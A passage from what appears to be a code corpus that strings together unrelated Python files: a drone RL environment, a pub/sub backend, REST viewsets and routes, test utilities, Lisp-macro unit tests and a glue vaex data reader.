self.x1, self.x2, self.y1, self.y2 = None, None, None, None
while len(self.bined_obs) == 0 and obs_count <= self.fail_sec_detect_TH:
try:
self.bined_obs = self.observe()
obs_count += 1
except:
rospy.loginfo("Getting observation again - Step!")
# Get the reward and see if we reach the goal
self.reward_function()
return self.bined_obs+self.bined_goal, self.reward, self.done, [self.drone_shot, self.end]
def reward_function(self):
goal_reward = 1 # points
fail_reward = 1 # points
if len(self.bined_obs) != 0 or len(self.prev_bined_obs) != 0:
if len(self.bined_obs) == 0:
print("previous", self.prev_bined_obs, "current", self.bined_obs)
#self.bined_obs = self.prev_bined_obs
self.reward = -1.0
#self.done = True
self.end = True
if self.x1 < 5 or self.y1 < 5 or self.x2 > 635 or self.y2 > 355:
self.reward = -1.0
# self.done = True
self.end = True
else:
# if self.stepCount <= self.steps_TH:
diff0 = abs(self.bined_goal[0] - self.bined_obs[0])
diff1 = abs(self.bined_goal[1] - self.bined_obs[1])
diff2 = abs(self.bined_goal[2] - self.bined_obs[2])
diff3 = abs(self.bined_goal[3] - self.bined_obs[3])
# self.reward = -(((float(diff0) / 8.0) + (float(diff1) / 8.0) + (float(diff2) / 6.0) +
# (float(diff3) / 7.0)) / 4.0)
if diff0 > 1:
self.reward -= ((float(diff0) * 21.0) / 168.0) / 4.0
elif diff0 == 1:
self.reward += 0.0
elif diff0 == 0:
self.reward += 0.1
if diff1 > 1:
self.reward -= ((float(diff1) * 21.0) / 168.0) / 4.0
elif diff1 == 1:
self.reward += 0.0
elif diff1 == 0:
self.reward += 0.1
if diff2 > 1:
self.reward -= ((float(diff2) * 28.0) / 168.0) / 4.0
elif diff2 == 1:
self.reward += 0.0
elif diff2 == 0:
self.reward += 0.1
if diff3 > 1:
self.reward -= ((float(diff3) * 24.0) / 168.0) / 4.0
elif diff3 == 1:
self.reward += 0.0
elif diff3 == 0:
self.reward += 0.1
if diff0 == 0 and diff1 == 0 and diff2 == 0 and diff3 == 0:
self.reward = 1.0
self.drone_shot += 1
# self.drone_shot_count += 1
# if self.drone_shot_count == 2:
self.done = True
# if self.stepCount == self.steps_TH:
# self.done = True
# return observation either [] or [Drone_Yaw, bbx_centroid.x, bbx_centroid.y, bbx_ratio]
def observe(self):
self.imu = None
while self.imu is None:
try:
self.imu = rospy.wait_for_message('/drone/imu', Imu, timeout=5)
self.drone_yaw = self.process_imu()
except:
rospy.loginfo("Current drone Imu is not ready yet, retrying for getting phone IMU")
self.img = None
while self.img is None:
try:
self.img = rospy.wait_for_message('/drone/front_camera/image_raw', Image, timeout=1)
except:
rospy.loginfo("Current drone Image is not ready yet")
if self.img is not None:
frame = self.bridge.imgmsg_to_cv2(self.img, "bgr8")
ready_image = frame.copy()
self.bbx = self.dunet.run_detect(ready_image)
if len(self.bbx) !=0:
self.box_ratio, self.box_centroid, self.x1, self.y1, self.x2, self.y2 = bounding_box_DUNET(self.f_W, self.f_H, self.bbx)
'''[Drone_Yaw, bbx_centroid.x, bbx_centroid.y, bbx_ratio]'''
obs = [self.drone_yaw, self.box_centroid[0], self.box_centroid[1], self.box_ratio]
self.bined_obs = [self.to_bin(obs[0], self.yaw_bins), self.to_bin(obs[1], self.cx_bins),
self.to_bin(obs[2], self.cy_bins), self.to_bin(obs[3], self.ratio_bins)]
else:
self.bined_obs = []
return self.bined_obs
def takeoff_sequence(self, seconds_taking_off=1.0):
# Before taking off, make sure that cmd_vel is not null to avoid drifts.
self.vel_pub.publish(cmdVel(0, 1))
self.takeoff_pub.publish(Empty())
time.sleep(seconds_taking_off)
def process_imu(self):
if self.imu is not None:
euler = tf.transformations.euler_from_quaternion(
[self.imu.orientation.x, self.imu.orientation.y, self.imu.orientation.z, self.imu.orientation.w]
)
# roll = euler[0]
# pitch = euler[1]
yaw = euler[2]
return yaw
# Arange Value based on bins: return indices
def to_bin(self, value, bins):
return np.digitize(x=[value], bins=bins)[0]
# Random Number Generator, used by the learning algorithm when generating random actions
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
# Go up and wait for 1 sec
def send_up_cmd(self):
self.vel_pub.publish(cmdVel(5, 1)) # 5
time.sleep(0.8)
self.vel_pub.publish(cmdVel(0, 1))
time.sleep(0.5)
# Reset position
def reset_pos(self):
state = ModelState()
state.model_name = "sjtu_drone"
# Define Initial position for _reset
# init_pos = [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.4, -2.9, 0.0, 0.0, 0.0, 0.0], [-1.65, 1.8, 0.0, 0.0, 0.0, 0.0]]
init_pos = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
# p = random.randint(0, 2)
self.initPose.position.x = init_pos[0]
self.initPose.position.y = init_pos[1]
self.initPose.position.z = init_pos[2]
self.initPose.orientation.x = init_pos[3]
self.initPose.orientation.y = init_pos[4]
self.initPose.orientation.z = init_pos[5]
self.initPose.orientation.w = 0.0
state.pose = self.initPose
ret = self.g_set_state(state)
loc = PoseWithCovarianceStamped()
loc.pose.pose = self.initPose
loc.header.frame_id = "/map"
self.pos_pub.publish(loc)
self.pos_pub.publish(loc)
self.pos_pub.publish(loc)
| 1.820313
| 2
|
anypubsub/backends/memory.py
|
smarzola/anypubsub
| 6
|
12783534
|
<filename>anypubsub/backends/memory.py
from collections import defaultdict
from anypubsub.interfaces import PubSub, Subscriber
from six.moves.queue import Queue
from weakref import WeakSet
class MemorySubscriber(Subscriber):
def __init__(self, queue_factory):
self.messages = queue_factory(maxsize=0)
def __iter__(self):
return self
def next(self):
return self.messages.get(block=True, timeout=None)
__next__ = next # PY3
def put(self, message):
self.messages.put_nowait(message)
class MemoryPubSub(PubSub):
def __init__(self, queue_factory=Queue):
self.subscribers = defaultdict(WeakSet)
self.queue_factory = queue_factory
def publish(self, channel, message):
subscribers = self.subscribers[channel]
for subscriber in subscribers:
subscriber.put(message)
return len(subscribers)
def subscribe(self, *channels):
subscriber = MemorySubscriber(self.queue_factory)
for channel in channels:
self.subscribers[channel].add(subscriber)
return subscriber
backend = MemoryPubSub
| 2.453125
| 2
|
LED-control/software/scripts/setoff.py
|
jeremywrnr/life-of-the-party
| 1
|
12783535
|
import liblo
import time
addresses = [liblo.Address("192.168.1.3","2222"),liblo.Address("192.168.1.4","2222"),liblo.Address("192.168.1.5","2222"),liblo.Address("192.168.1.6","2222"),liblo.Address("192.168.1.7","2222"),liblo.Address("192.168.1.8","2222"),liblo.Address("192.168.1.9","2222"),liblo.Address("192.168.1.10","2222"),liblo.Address("192.168.1.11","2222"),liblo.Address("192.168.1.12","2222"),liblo.Address("192.168.1.13","2222"),liblo.Address("192.168.1.14","2222"),liblo.Address("192.168.1.15","2222"),liblo.Address("192.168.1.16","2222"),liblo.Address("192.168.1.17","2222")]
r=0
g=0
b=0
for address in addresses:
liblo.send(address,'22',('f', r),('f', g),('f', b))
| 2.09375
| 2
|
tests/utils/utils.py
|
bossjones/ultron8
| 0
|
12783536
|
<reponame>bossjones/ultron8<gh_stars>0
import logging
import random
import string
from typing import Dict
import requests
from requests.models import Response
from sqlalchemy.orm import Session
from starlette.testclient import TestClient
from ultron8.api import settings
logger = logging.getLogger(__name__)
def random_lower_string() -> str:
return "".join(random.choices(string.ascii_lowercase, k=32))
def random_email() -> str:
return f"{random_lower_string()}@{random_lower_string()}.com"
def get_server_api() -> str:
server_name = f"http://{settings.SERVER_NAME}"
logger.debug("server_name: '%s'", server_name)
return server_name
def get_server_api_with_version() -> str:
"""Return url w/ api versioning in it. eg. http://localhost:11267/v1
Returns:
str -- url in string format
"""
server_name = f"http://{settings.SERVER_NAME}{settings.API_V1_STR}"
logger.debug("server_name: '%s'", server_name)
return server_name
def get_superuser_jwt_request() -> Response:
server_api = get_server_api()
login_data = {
"username": settings.FIRST_SUPERUSER,
"password": <PASSWORD>.FIRST_<PASSWORD>,
}
r = requests.post(
f"{server_api}{settings.API_V1_STR}/login/access-token", data=login_data
)
return r
def get_superuser_token_headers() -> Dict[str, str]:
r = get_superuser_jwt_request()
tokens = r.json()
a_token = tokens["access_token"]
headers = {"Authorization": f"Bearer {a_token}"}
# superuser_token_headers = headers
return headers
superuser_credentials = [
settings.FIRST_SUPERUSER.encode(),
settings.FIRST_SUPERUSER_PASSWORD.encode(),
]
# TODO: Figure out if we want to use this or not
def get_superuser_token_headers2(client: TestClient) -> Dict[str, str]:
"""Does basically the same as get_superuser_token_headers() only this time it uses the starlette TestClient
Arguments:
client {TestClient} -- [description]
Returns:
Dict[str, str] -- [description]
"""
login_data = {
"username": settings.FIRST_SUPERUSER,
"password": settings.FIRST_SUPERUSER_PASSWORD,
}
r = client.post(f"{settings.API_V1_STR}/login/access-token", data=login_data)
tokens = r.json()
a_token = tokens["access_token"]
headers = {"Authorization": f"Bearer {a_token}"}
return headers
| 2.34375
| 2
|
src/v1/views.py
|
Diaga/Spekit_Tech_Project
| 0
|
12783537
|
<reponame>Diaga/Spekit_Tech_Project
from rest_framework.viewsets import GenericViewSet, mixins
from . import models
from . import serializers
from . import filters
class TopicViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.ListModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin):
queryset = models.Topic.objects.all()
serializer_class = serializers.TopicSerializer
class FolderViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.ListModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin):
queryset = models.Folder.objects.all()
serializer_class = serializers.FolderSerializer
filterset_class = filters.FolderFilter
class DocumentViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.ListModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin):
queryset = models.Document.objects.all()
serializer_class = serializers.DocumentSerializer
filterset_class = filters.DocumentFilter
class FolderTopicViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.DestroyModelMixin):
queryset = models.FolderTopic.objects.all()
serializer_class = serializers.FolderTopicSerializer
class DocumentTopicViewSet(GenericViewSet,
mixins.CreateModelMixin,
mixins.DestroyModelMixin):
queryset = models.DocumentTopic.objects.all()
serializer_class = serializers.DocumentTopicSerializer
| 1.96875
| 2
|
src/datasets/dataset_student.py
|
oscareriksson/FedML-master-thesis
| 0
|
12783538
|
<filename>src/datasets/dataset_student.py
from torch.utils.data import Dataset
class StudentData(Dataset):
def __init__(self, dataset):
self.dataset = dataset
def __getitem__(self, index):
if isinstance(index, list):
data, _ = self.dataset[[i for i in index]]
else:
data, _ = self.dataset[index]
return data, index
def __len__(self):
"""Total number of samples"""
return len(self.dataset)
| 3
| 3
|
shfl/differential_privacy/probability_distribution.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
| 2
|
12783539
|
import numpy as np
import abc
class ProbabilityDistribution(abc.ABC):
"""
Class representing the interface for a probability distribution
"""
@abc.abstractmethod
def sample(self, size):
"""
This method must return an array with length "size", sampling the distribution
# Arguments:
size: Size of the sampling
"""
class NormalDistribution(ProbabilityDistribution):
"""
Implements Normal Distribution
# Arguments:
mean: Mean of the normal distribution.
std: Standard deviation of the normal distribution
"""
def __init__(self, mean, std):
self._mean = mean
self._std = std
def sample(self, size):
"""
This method provides a sample of the given size of a gaussian distributions
# Arguments:
size: size of the sample
# Returns:
Sample of a gaussian distribution of a given size
"""
return np.random.normal(self._mean, self._std, size)
class GaussianMixture(ProbabilityDistribution):
"""
Implements the combination of Normal Distributions
# Arguments:
params: Array of arrays with mean and std for every gaussian distribution.
weights: Array of weights for every distribution with sum 1.
# Example:
```python
# Parameters for two Gaussian
mu_M = 178
mu_F = 162
sigma_M = 7
sigma_F = 7
# Parameters
norm_params = np.array([[mu_M, sigma_M],
[mu_F, sigma_F]])
weights = np.ones(2) / 2.0
# Creating combination of gaussian
distribution = GaussianMixture(norm_params, weights)
```
"""
def __init__(self, params, weights):
self._gaussian_distributions = []
for param in params:
self._gaussian_distributions.append(NormalDistribution(param[0], param[1]))
self._weights = weights
def sample(self, size):
"""
This method provides a sample of the given size of a mixture of gaussian distributions
# Arguments:
size: size of the sample
# Returns:
Sample of a mixture of gaussian distributions of a given size
"""
mixture_idx = np.random.choice(len(self._weights), size=size, replace=True, p=self._weights)
values = []
for i in mixture_idx:
gaussian_distributions = self._gaussian_distributions[i]
values.append(gaussian_distributions.sample(1))
return np.fromiter(values, dtype=np.float64)
| 3.890625
| 4
|
service/user_service.py
|
LianGee/galio
| 8
|
12783540
|
<filename>service/user_service.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : user_service.py
# @Author: zaoshu
# @Date : 2020-02-10
# @Desc :
import json
from common.exception import ServerException
from model.user import User
class UserService:
@classmethod
def get_user_from_cas_resp(cls, response) -> User:
resp = json.loads(response.text).get('serviceResponse')
if resp.get('authenticationFailure'):
raise ServerException(msg=f"{resp.get('authenticationFailure').get('description')}")
else:
attributes = resp.get('authenticationSuccess').get('attributes')
return User(
**attributes.get('user')
)
| 2.453125
| 2
|
core/app/models/point.py
|
bitreport-org/Bitreport
| 3
|
12783541
|
<reponame>bitreport-org/Bitreport
class Point:
info = None
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return f"Point({self.x}, {self.y}), {self.info}"
def __eq__(self, other):
return (self.x == other.x) and (self.y == other.y)
def __hash__(self):
return hash((self.x, self.y))
def add_info(self, info: str):
self.info = info
| 3.046875
| 3
|
GoogleAppEngine_Side/main.py
|
nickolyamba/android-chem-app
| 0
|
12783542
|
<filename>GoogleAppEngine_Side/main.py
import webapp2
from google.appengine.api import oauth
config = {'Root':'default'}
app = webapp2.WSGIApplication([
('/supplier', 'supplier.Supplier'),
('/chemical', 'chemical.Chemical'),
('/solution', 'solution.Solution'),
('/signin', 'signin.GetToken'),
], debug=True)
# Source: lecture + reading
# https://webapp-improved.appspot.com/guide/routing.html#guide-routing
# [0-9]+ matches one or more digits, /? matches 0 or 1 '/'
# : is given after name, <> place for regex
app.router.add(webapp2.Route(r'/supplier/<id:[0-9]+>', 'supplier.Supplier'))
app.router.add(webapp2.Route(r'/supplier/<id:[a-zA-Z-]*>', 'supplier.SupplierSearch'))
#app.router.add(webapp2.Route(r'/supplier/search', 'supplier.SupplierSearch'))
app.router.add(webapp2.Route(r'/chemical/<cid:[a-zA-Z0-9]*><:/+><:[a-zA-Z]*><:/*><sid:[a-zA-Z0-9]*>', 'chemical.ChemicalSupplier'))
app.router.add(webapp2.Route(r'/chemical/<cid:[a-zA-Z0-9]+>', 'chemical.EditDeleteChem'))
app.router.add(webapp2.Route(r'/solution/<id:[0-9]+>', 'solution.Solution'))
| 2.765625
| 3
|
morphodynamics/landscapes/analysis/save_ims.py
|
hcbiophys/morphodynamics
| 1
|
12783543
|
import tensorflow as tf
import numpy as np
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import copy
from morphodynamics.landscapes.utils import get_meshgrid
from morphodynamics.landscapes.analysis.get_fields import *
from morphodynamics.landscapes.analysis.sde_forward import *
class Save_Ims():
"""
Save losses during training and the potential as an array
"""
def __init__(self, model, save_dir):
"""
- model: this is the physics-informed neural network (PINN)
- save_dir: where to save the plot and potential to
"""
self.model = model
self.save_dir = save_dir
x_test, y_test = get_meshgrid(model.xlims, model.ylims, model.dims, flatBool = True)
self.x_test , self.y_test = tf.convert_to_tensor(x_test), tf.convert_to_tensor(y_test)
self.fig = plt.figure(figsize = (30, 20))
self.gs = gridspec.GridSpec(nrows = 15, ncols = 17)
def __call__(self):
self._plot_losses()
self._plot_pdfs_getUandD()
self._plot_and_save_U()
#plt.savefig(self.save_dir + 'View_{}_{}.png'.format(self.model.save_append, self.model.idx_save))
#plt.close()
def _setup_ax(self, ax):
ax.set_aspect('equal', adjustable = 'box')
ax.set_xlim(self.model.xlims)
ax.set_ylim(self.model.ylims)
def _plot_losses(self):
"""
Plot how each of the loss terms changes in time
"""
ax = self.fig.add_subplot(self.gs[2:5, :7])
losses = [self.model.data_losses, self.model.BC_losses, self.model.pde_losses, self.model.total_losses, self.model.norm_losses]
labels = ['pdf', 'BC', 'pde', 'total', 'norm']
zipped = zip(losses, labels)
for loss_list, label in zipped:
ax.plot(np.log10(loss_list), label = label)
ax.legend()
def _plot_pdfs_getUandD(self):
"""
Run inference to get the pdf, potential (U) and diffusivity (D)
"""
p_max = 0
D_max = 0
for idx_t, test_time in enumerate(np.linspace(self.model.tlims[0], self.model.tlims[1], 7)): # test for a range of unseen times
t_test = np.tile(np.array([test_time]), (self.x_test.shape[0], 1))
t_test = tf.convert_to_tensor(t_test)
xyt_test = tf.concat((self.x_test, self.y_test, t_test), axis = 1)
p_out, D_out, U_out = self.model.predict(xyt_test)
D_out = D_out.numpy()
p_max = max(p_max, np.max(p_out))
D_max = max(D_max, np.max(D_out))
for idx_t, test_time in enumerate(np.linspace(self.model.tlims[0], self.model.tlims[1], 7)): # test for a range of unseen times
t_test = np.tile(np.array([test_time]), (self.x_test.shape[0], 1))
t_test = tf.convert_to_tensor(t_test)
xyt_test = tf.concat((self.x_test, self.y_test, t_test), axis = 1)
p_out, D_out, U_out = self.model.predict(xyt_test)
p_out = p_out.numpy()
D_out = D_out.numpy()
U_out = U_out.numpy()
ax_p = self.fig.add_subplot(self.gs[6, idx_t])
p_out[p_out<1e-7] = np.nan
ax_p.scatter(self.x_test, self.y_test, c = np.log10(p_out), vmin = -7, vmax = max(np.log10(p_max), -7))
self._setup_ax(ax_p)
ax_D = self.fig.add_subplot(self.gs[6, 8+idx_t])
ax_D.scatter(self.x_test, self.y_test, c = D_out, vmin = 0, vmax = D_max)
self._setup_ax(ax_D)
for idx_t, arr in enumerate(self.model.pdf_list):
ax = self.fig.add_subplot(self.gs[14, idx_t])
to_log = copy.deepcopy(arr)
to_log[to_log<1e-7] = np.nan
ax.imshow(np.log10(to_log.reshape((200, 200))[::-1, :]))
self.U_out = U_out
def _plot_and_save_U(self):
"""
Plot and save the potential as an array
"""
U = np.reshape(self.U_out, (self.model.dims, self.model.dims))
path = self.save_dir + 'potential.pickle'
dump_pickle(U, path)
ax = self.fig.add_subplot(self.gs[:4, 10:14])
gx, gy = np.gradient(U)
ax.imshow(np.log10(np.sqrt(gx**2 + gy**2))[::-1, :])
ax.set_aspect('equal', adjustable = 'box')
| 2.21875
| 2
|
nso/test_api.py
|
caputomarcos/network-programmability-stream
| 120
|
12783544
|
<reponame>caputomarcos/network-programmability-stream
#!/usr/bin/env python3
import ncs
from ncs.maagic import Root
from typing import Iterator, Tuple
NSO_USERNAME = 'admin'
NSO_CONTEXT = 'python'
# NSO_GROUPS = ['ncsadmin']
def get_device_name(nso: Root) -> Iterator[Tuple[str, str]]:
for device in nso.devices.device:
# print device.config.ios__cached_show.version.model
breakpoint()
yield (device.name, device.ios__cached_show.version.model)
def main() -> None:
with ncs.maapi.single_read_trans(NSO_USERNAME, NSO_CONTEXT) as transaction:
nso = ncs.maagic.get_root(transaction)
devices = nso.devices.device
# print(devices["isp1-pe1"].config.ios__ntp.server.peer_list)
# breakpoint()
for device in devices:
device.config.ios__ntp.server.peer_list.append({"name": "192.168.3.11"})
# device.config.ios__ntp.server.ip = "192.168.3.11"
# print(device.name)
# print(device.config.ios__ntp)
# print(device.config.ios__cached_show.version)
transaction.apply()
if __name__ == '__main__':
main()
| 2.0625
| 2
|
test/test_macro/test_system_macro.py
|
takahish/lispy
| 4
|
12783545
|
# Copyright 2019 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
from clispy.macro.system_macro import *
from clispy.package import PackageManager
from clispy.parser import Parser
class SystemMacroUnitTestCase(unittest.TestCase):
def testSystemMacro(self):
# Makes an instance of SystemMacro.
macro = SystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO SYSTEM-MACRO \{[0-9A-Z]+\}>")
class BlockSystemMacroUnitTestCase(unittest.TestCase):
def testBlockSystemMacro(self):
# Makes an instance of BlockSystemMacro.
macro = BlockSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO BLOCK \{[0-9A-Z]+\}>")
def testBlockSystemMacro_call(self):
# Makes an instance of BlockSystemMacro.
macro = BlockSystemMacro()
# Checks official representation.
forms = Parser.parse('(NAME (+ 1 2 3))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(BLOCK NAME (PROGN (+ 1 2 3)))')
class FletSystemMacroUnitTestCase(unittest.TestCase):
def testFletSystemMacro(self):
# Makes an instance of FletSystemMacro.
macro = FletSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO FLET \{[0-9A-Z]+\}>")
def testFletSystemMacro_call(self):
# Makes an instance of FletSystemMacro.
macro = FletSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST (X) (* X X X))) (TEST 10))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(FLET ((TEST (X) (* X X X))) (PROGN (TEST 10)))')
class IfSystemMacroUnitTestCase(unittest.TestCase):
def testIfSystemMacro(self):
# Makes an instance of IfSystemMacro.
macro = IfSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO IF \{[0-9A-Z]+\}>")
def testIfSystemMacro_call(self):
# Makes an instance of IfSystemMacro.
macro = IfSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO IF \{[0-9A-Z]+\}>")
# Checks official representation.
forms = Parser.parse('((= 1 2) 3)')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(IF (= 1 2) 3 NIL)')
class LabelsSystemMacroUnitTestCase(unittest.TestCase):
def testLabelsSystemMacro(self):
# Makes an instance of LabelsSystemMacro.
macro = LabelsSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LABELS \{[0-9A-Z]+\}>")
def testLabelsSystemMacro_call(self):
# Makes an instance of LabelsSystemMacro.
macro = LabelsSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST (X) (* X X X))) (TEST 10))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LABELS ((TEST (X) (* X X X))) (PROGN (TEST 10)))')
class LetSystemMacroUnitTestCase(unittest.TestCase):
def testLetSystemMacro(self):
# Makes an instance of LetSystemMacro.
macro = LetSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LET \{[0-9A-Z]+\}>")
def testLetSystemMacro_call(self):
# Makes an instance of LetSystemMacro.
macro = LetSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST 10)) (CONS TEST NIL))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LET ((TEST 10)) (PROGN (CONS TEST NIL)))')
class LetAsterSystemMacroUnitTestCase(unittest.TestCase):
def testLetAsterSystemMacro(self):
# Makes an instance of LetAsterSystemMacro.
macro = LetAsterSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LET\* \{[0-9A-Z]+\}>")
def testLetAsterSystemMacro_call(self):
# Makes an instance of LetAsterSystemMacro.
macro = LetAsterSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST 10)) (CONS TEST NIL))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LET* ((TEST 10)) (PROGN (CONS TEST NIL)))')
class QuoteSystemMacroUnitTestCase(unittest.TestCase):
def testQuoteSystemMacro(self):
# Makes an instance of QuoteSystemMacro.
macro = QuoteSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO QUOTE \{[0-9A-Z]+\}>")
def testQuoteSystemMacro_call(self):
# Makes an instance of QuoteSystemMacro.
macro = QuoteSystemMacro()
# Checks official representation.
forms = Parser.parse('(A)')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(QUOTE A)')
class LambdaSystemMacroUnitTestCase(unittest.TestCase):
def testLambdaSystemMacro(self):
# Makes an instance of LambdaSystemMacro.
macro = LambdaSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LAMBDA \{[0-9A-Z]+\}>")
def testLambdaSystemMacro_call(self):
# Makes an instance of LambdaSystemMacro.
macro = LambdaSystemMacro()
# Checks official representation.
forms = Parser.parse('((X) (* X X X))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LAMBDA (X) (PROGN (* X X X)))')
class DefunSystemMacroUnitTestCase(unittest.TestCase):
def testDefunSystemMacro(self):
# Makes an instance of DefunSystemMacro.
macro = DefunSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO DEFUN \{[0-9A-Z]+\}>")
def testDefunSystemMacro_call(self):
# Makes an instance of DefunSystemMacro.
macro = DefunSystemMacro()
# Checks official representation.
forms = Parser.parse('(NAME (X) (* X X X))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(DEFUN NAME (X) (BLOCK NAME (PROGN (* X X X))))')
class DefmacroSystemMacroUnitTestCase(unittest.TestCase):
def testDefmacroSystemMacro(self):
# Makes an instance of DefmacroSystemMacro.
macro = DefmacroSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO DEFMACRO \{[0-9A-Z]+\}>")
def testDefmacroSystemMacro_call(self):
# Makes an instance of DefunSystemMacro.
macro = DefmacroSystemMacro()
# Checks official representation.
forms = Parser.parse('(NAME (X) (* X X X))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(DEFMACRO NAME (X) (BLOCK NAME (PROGN (* X X X))))')
class BackquoteSystemMacroUnitTestCase(unittest.TestCase):
def testBackquoteSystemMacro(self):
# Makes an instance of BackquoteSystemMacro.
macro = BackquoteSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO BACKQUOTE \{[0-9A-Z]+\}>")
def testBackquoteSystemMacro_call(self):
# Makes an instance of DefunSystemMacro.
macro = BackquoteSystemMacro()
# Checks official representation.
forms = Parser.parse('(((UNQUOTE X) (UNQUOTE-SPLICING Y)))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(CONS X (APPEND Y (QUOTE NIL)))')
| 2.28125
| 2
|
backend/routers/timeline.py
|
DavidLee0216/SWOOSH
| 0
|
12783546
|
from flask import request, Blueprint
from controllers import timelines
from pkg.warpResponse import warpResponse
timeline = Blueprint('timeline', __name__)
@timeline.route("/", methods=['GET'])
def getAllTimelines():
resp, code = timelines.FindAll()
if resp is not None:
return warpResponse(resp)
else:
return warpResponse(None, code)
@timeline.route("/findOne", methods=['POST'])
def getOneTimelines():
r = request.get_json()
if 'start' in r:
resp, code = timelines.FindAllWithCond(r)
else:
resp, code = timelines.FindOne(r)
if resp is not None:
return warpResponse(resp)
else:
return warpResponse(None, code)
@timeline.route("/add", methods=['POST'])
def createTimelines():
r = request.get_json()
code = timelines.Create(r)
if code is not None:
return warpResponse(None, code)
else:
return warpResponse(None, code)
@timeline.route("/<id>", methods=['POST'])
def patchTimelines(id):
r = request.get_json()
code = timelines.Patch(id, r)
if code is not None:
return warpResponse(None, code)
else:
return warpResponse(None, code)
| 2.484375
| 2
|
glue_vaex/__init__.py
|
glue-viz/glue-vaex
| 0
|
12783547
|
from __future__ import absolute_import, division, print_function
import os
import glob
from glue.logger import logger
from glue.core.data import Data
from glue.config import data_factory
import vaex.hdf5.dataset
from .data import DataVaex
def is_vaex_file(source):
return vaex.hdf5.dataset.Hdf5MemoryMapped.can_open(source)
@data_factory(
label='vaex file or directory',
identifier=is_vaex_file,
priority=1000,
)
def vaex_reader(source):
"""
Read a vaex hdf5 file
"""
if os.path.isdir(source):
arrays = {}
for filename in glob.glob(os.path.join(source, '*')):
if is_vaex_file(filename):
logger.info("Reading vaex data from {0}".format(filename))
ds = vaex.open(filename)
else:
logger.info("Not a vaex file: {0}".format(filename))
# If there are no vaex files, we raise an error, and if there is one
# then we are done!
if len(arrays) == 0:
